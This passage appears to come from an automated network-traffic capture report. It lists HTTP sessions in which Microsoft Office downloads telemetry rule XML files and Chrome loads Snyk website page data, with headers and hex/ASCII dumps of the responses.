                                                                                                                                                                                                                                                                                                              x-ms-request-id: 331d1c77-401e-0029-354e-229b43000000
                                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                              x-azure-ref: 20241024T194908Z-16849878b78mhkkf6kbvry07q0000000083g000000008aak
                                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:08 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                              66192.168.2.54981613.107.246.60443
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:08 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:08 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:08 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                                              Content-Length: 2160
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                                                                              ETag: "0x8DC582BA3B95D81"
                                                                                                                                                                                                                                                                                                              x-ms-request-id: cddcf92d-501e-008f-6a41-269054000000
                                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                              x-azure-ref: 20241024T194908Z-r197bdfb6b4r9fwf6wxpr8zer000000000hg00000000c9t4
                                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:08 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              67192.168.2.54982523.45.111.1604434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:08 UTC416OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/product.json?slug=product HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:08 UTC621INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              ETag: W/"hk68cv0rtt1k2a"
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/product.json
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: STALE
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: fra1::iad1::g89wj-1729799348535-06ebf3352a5d
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:08 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.42284317.1729799348.10944fe
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:08 UTC15763INData Raw: 30 30 30 30 36 30 30 30 0d 0a 7b 22 70 61 67 65 50 72 6f 70 73 22 3a 7b 22 70 61 67 65 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 37 75 69 62 44 46 59 54 79 30 45 6d 34 74 4a 68 33 45 52 43 4d 49 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 32 2d 31 32 2d 31 32 54 32 32 3a 33 31 3a 32 39 2e 35 34 35 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 30 39 2d 32 32 54
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"7uibDFYTy0Em4tJh3ERCMI","type":"Entry","createdAt":"2022-12-12T22:31:29.545Z","updatedAt":"2023-09-22T
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:08 UTC8825INData Raw: 6e 63 65 22 3a 7b 22 74 65 78 74 4d 65 64 69 61 22 3a 7b 7d 7d 7d 7d 2c 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 36 32 50 4f 7a 48 6e 53 4c 47 54 52 65 75 34 62 41 69 34 69 65 31 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 32 2d 31 32 2d 31 32 54 32 32 3a 33 31 3a 33 30 2e 31 39 32 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 30 39 2d 32 30 54 32 32 3a 30 34 3a 33
                                                                                                                                                                                                                                                                                                              Data Ascii: nce":{"textMedia":{}}}},{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"62POzHnSLGTReu4bAi4ie1","type":"Entry","createdAt":"2022-12-12T22:31:30.192Z","updatedAt":"2023-09-20T22:04:3
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:08 UTC16384INData Raw: 30 30 30 30 36 30 30 30 0d 0a 67 5f 76 65 72 73 69 6f 6e 2e 6d 70 34 22 2c 22 74 61 67 73 22 3a 5b 5d 2c 22 74 79 70 65 22 3a 22 75 70 6c 6f 61 64 22 2c 22 62 79 74 65 73 22 3a 32 31 36 30 33 34 33 2c 22 77 69 64 74 68 22 3a 31 32 33 38 2c 22 66 6f 72 6d 61 74 22 3a 22 6d 70 34 22 2c 22 68 65 69 67 68 74 22 3a 37 39 32 2c 22 76 65 72 73 69 6f 6e 22 3a 31 36 37 31 32 30 30 31 36 39 2c 22 64 75 72 61 74 69 6f 6e 22 3a 31 30 2c 22 6d 65 74 61 64 61 74 61 22 3a 5b 5d 2c 22 70 75 62 6c 69 63 5f 69 64 22 3a 22 43 6f 6e 74 61 69 6e 65 72 5f 53 63 72 65 65 6e 69 65 5f 2d 5f 6c 6f 6e 67 5f 76 65 72 73 69 6f 6e 22 2c 22 63 72 65 61 74 65 64 5f 61 74 22 3a 22 32 30 32 32 2d 31 32 2d 31 36 54 31 34 3a 31 36 3a 30 39 5a 22 2c 22 73 65 63 75 72 65 5f 75 72 6c 22 3a 22
                                                                                                                                                                                                                                                                                                              Data Ascii: 00006000g_version.mp4","tags":[],"type":"upload","bytes":2160343,"width":1238,"format":"mp4","height":792,"version":1671200169,"duration":10,"metadata":[],"public_id":"Container_Screenie_-_long_version","created_at":"2022-12-16T14:16:09Z","secure_url":"
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC8204INData Raw: 5b 5d 2c 22 76 61 6c 75 65 22 3a 22 4f 75 72 20 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 22 75 72 69 22 3a 22 2f 70 6c 61 74 66 6f 72 6d 2f 73 65 63 75 72 69 74 79 2d 69 6e 74 65 6c 6c 69 67 65 6e 63 65 2f 22 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 7b 22 74 79 70 65 22 3a 22 75 6e 64 65 72 6c 69 6e 65 22 7d 5d 2c 22 76 61 6c 75 65 22 3a 22 73 65 63 75 72 69 74 79 20 69 6e 74 65 6c 6c 69 67 65 6e 63 65 20 64 61 74 61 62 61 73 65 22 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 74 65 78 74 22 7d 5d 2c 22 6e 6f 64 65 54 79 70 65 22 3a 22 68 79 70 65 72 6c 69 6e 6b 22 7d 2c 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a 5b 5d 2c 22 76 61 6c 75 65 22
                                                                                                                                                                                                                                                                                                              Data Ascii: [],"value":"Our ","nodeType":"text"},{"data":{"uri":"/platform/security-intelligence/"},"content":[{"data":{},"marks":[{"type":"underline"}],"value":"security intelligence database","nodeType":"text"}],"nodeType":"hyperlink"},{"data":{},"marks":[],"value"
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC16384INData Raw: 30 30 30 30 34 30 30 30 0d 0a 74 69 6f 6e 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 36 67 68 34 72 5a 72 35 64 56 44 51 32 78 50 66 77 7a 33 49 58 38 22 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 53 79 73 22 7d 2c 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 6f 6e 74 65 6e 74 4e 61 76 69 67 61 74 69 6f 6e 49 74 65 6d 22 2c 22 6c 61 62 65 6c 22 3a 22 57 68 79 20 53 6e 79 6b 3f 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4d 6f 64 65 72 6e 20 73 65 63 75 72 69 74 79 20 69 6e 20 61 20 73 69 6e 67 6c 65 20 70 6c 61 74 66 6f 72 6d 22 2c 22 75 72 6c 22 3a 22 2f 70 6c 61 74 66 6f 72 6d 2f 22 2c 22 61 70 70 65 61 72 61 6e 63 65 22 3a 7b 22 6e 61 76 49 74 65 6d 22 3a 7b 22 69 63 6f 6e 22 3a 22 63 68 65 63 6b 62 6f 78 2d 68
                                                                                                                                                                                                                                                                                                              Data Ascii: 00004000tion","items":[{"sys":{"id":"6gh4rZr5dVDQ2xPfwz3IX8","__typename":"Sys"},"__typename":"ContentNavigationItem","label":"Why Snyk?","description":"Modern security in a single platform","url":"/platform/","appearance":{"navItem":{"icon":"checkbox-h
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC12INData Raw: 65 6e 61 6d 65 22 3a 22 4e 61 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: ename":"Na
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC7166INData Raw: 30 30 30 30 31 42 46 32 0d 0a 76 69 67 61 74 69 6f 6e 46 6f 6f 74 65 72 41 63 74 69 6f 6e 73 43 6f 6c 6c 65 63 74 69 6f 6e 22 7d 2c 22 73 70 6f 6e 73 6f 72 65 64 4c 6f 67 6f 22 3a 5b 5d 2c 22 73 70 6f 6e 73 6f 72 65 64 55 72 6c 22 3a 6e 75 6c 6c 2c 22 66 6f 6f 74 65 72 43 74 61 48 65 61 64 65 72 22 3a 22 54 68 65 20 64 65 76 65 6c 6f 70 65 72 20 73 65 63 75 72 69 74 79 20 70 6c 61 74 66 6f 72 6d 22 2c 22 66 6f 72 6d 22 3a 7b 22 5f 5f 74 79 70 65 6e 61 6d 65 22 3a 22 43 6f 6e 74 65 6e 74 46 6f 72 6d 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 7b 22 6a 73 6f 6e 22 3a 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 63 6f 6e 74 65 6e 74 22 3a 5b 7b 22 64 61 74 61 22 3a 7b 7d 2c 22 6d 61 72 6b 73 22 3a
                                                                                                                                                                                                                                                                                                              Data Ascii: 00001BF2vigationFooterActionsCollection"},"sponsoredLogo":[],"sponsoredUrl":null,"footerCtaHeader":"The developer security platform","form":{"__typename":"ContentForm","description":{"json":{"data":{},"content":[{"data":{},"content":[{"data":{},"marks":
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC12INData Raw: 30 30 30 30 30 30 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 00000000


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                              68192.168.2.54981413.107.246.60443
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:08 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:08 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:08 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                                                                                              Content-Length: 450
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                                                                                                                                                                                              ETag: "0x8DC582BD4C869AE"
                                                                                                                                                                                                                                                                                                              x-ms-request-id: 5e9af5f8-e01e-0099-17f4-24da8a000000
                                                                                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                              x-azure-ref: 20241024T194908Z-15b8d89586f989rkfw99rwd68g00000000qg00000000fgby
                                                                                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:08 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                              69192.168.2.54981123.77.250.634434724C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:08 UTC618OUTGET /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/platform.json?slug=platform HTTP/1.1
                                                                                                                                                                                                                                                                                                              Host: snyk.io
                                                                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                              purpose: prefetch
                                                                                                                                                                                                                                                                                                              x-nextjs-data: 1
                                                                                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                              x-middleware-prefetch: 1
                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                              Cookie: user_utm={}
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC622INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                              Content-Type: application/json
                                                                                                                                                                                                                                                                                                              ETag: W/"t856ukcshc251q"
                                                                                                                                                                                                                                                                                                              Server: Vercel
                                                                                                                                                                                                                                                                                                              X-Matched-Path: /_next/data/Cp4abAN54CGUdTYwS0J62/en-US/platform.json
                                                                                                                                                                                                                                                                                                              X-Vercel-Cache: STALE
                                                                                                                                                                                                                                                                                                              X-Vercel-Id: arn1::iad1::wlqlx-1729799348638-1149a03b86ba
                                                                                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 19:49:08 GMT
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                                                                                                                                              Akamai-Cache-Status: NotCacheable from child
                                                                                                                                                                                                                                                                                                              Akamai-GRN: 0.5a1d4117.1729799348.1f60e32
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC15762INData Raw: 30 30 30 30 43 30 30 30 0d 0a 7b 22 70 61 67 65 50 72 6f 70 73 22 3a 7b 22 70 61 67 65 22 3a 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 74 61 67 73 22 3a 5b 5d 2c 22 63 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 33 63 6b 6b 32 7a 6b 36 6f 53 50 34 78 31 47 43 68 34 78 38 4f 48 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 32 2d 31 31 2d 30 39 54 31 38 3a 33 37 3a 35 38 2e 36 38 36 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 33 2d 30 39 2d 32 33 54
                                                                                                                                                                                                                                                                                                              Data Ascii: 0000C000{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"3ckk2zk6oSP4x1GCh4x8OH","type":"Entry","createdAt":"2022-11-09T18:37:58.686Z","updatedAt":"2023-09-23T
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC15999INData Raw: 6f 6e 63 65 70 74 73 22 3a 5b 5d 7d 2c 22 73 79 73 22 3a 7b 22 73 70 61 63 65 22 3a 7b 22 73 79 73 22 3a 7b 22 74 79 70 65 22 3a 22 4c 69 6e 6b 22 2c 22 6c 69 6e 6b 54 79 70 65 22 3a 22 53 70 61 63 65 22 2c 22 69 64 22 3a 22 6f 79 72 62 72 69 34 33 61 64 7a 7a 22 7d 7d 2c 22 69 64 22 3a 22 31 31 54 52 36 78 35 4d 4b 6c 74 44 45 38 65 46 6b 4d 70 47 74 33 22 2c 22 74 79 70 65 22 3a 22 45 6e 74 72 79 22 2c 22 63 72 65 61 74 65 64 41 74 22 3a 22 32 30 32 32 2d 31 31 2d 30 39 54 31 39 3a 30 31 3a 33 37 2e 36 35 34 5a 22 2c 22 75 70 64 61 74 65 64 41 74 22 3a 22 32 30 32 34 2d 30 37 2d 31 38 54 32 32 3a 33 31 3a 30 36 2e 30 31 32 5a 22 2c 22 65 6e 76 69 72 6f 6e 6d 65 6e 74 22 3a 7b 22 73 79 73 22 3a 7b 22 69 64 22 3a 22 6d 61 73 74 65 72 22 2c 22 74 79 70 65
                                                                                                                                                                                                                                                                                                              Data Ascii: oncepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"11TR6x5MKltDE8eFkMpGt3","type":"Entry","createdAt":"2022-11-09T19:01:37.654Z","updatedAt":"2024-07-18T22:31:06.012Z","environment":{"sys":{"id":"master","type
                                                                                                                                                                                                                                                                                                              2024-10-24 19:49:09 UTC16384INData Raw: 63 6f 64 69 66 79 69 6e 67 20 73 65 63 75 72 69 74 79 20 6f 62 6a 65 63 74 69 76 65 73 20 61 73 20 70 61 72 74 20 6f 66 20 74 68 65 20 6f 76 65 72 61 6c 6c 20 67 6f 61 6c 20 73 74 72 75 63 74 75 72 65 2e 20 44 65 76 53 65 63 4f 70 73 20 73 68 6f 75 6c 64 20 62 65 20 74 68 6f 75 67 68 74 20 6f 66 20 61 73 20 74 68 65 20 6e 61 74 75 72 61 6c 20 63 6f 6e 74 69 6e 75 61 74 69 6f 6e 20 6f 66 20 44 65 76 4f 70 73 2c 20 72 61 74 68 65 72 20 74 68 61 6e 20 61 73 20 61 20 73 65 70 61 72 61 74 65 20 69 64 65 61 20 6f 72 20 63 6f 6e 63 65 70 74 2e 20 54 65 61 6d 73 20 74 68 61 74 20 61 72 65 20 73 75 63 63 65 73 73 66 75 6c 20 69 6e 20 61 70 70 6c 79 69 6e 67 20 44 65 76 4f 70 73 20 70 72 61 63 74 69 63 65 73 20 73 68 6f 75 6c 64 20 74 68 69 6e 6b 20 6f 66 20 44 65
                                                                                                                                                                                                                                                                                                              Data Ascii: codifying security objectives as part of the overall goal structure. DevSecOps should be thought of as the natural continuation of DevOps, rather than as a separate idea or concept. Teams that are successful in applying DevOps practices should think of De
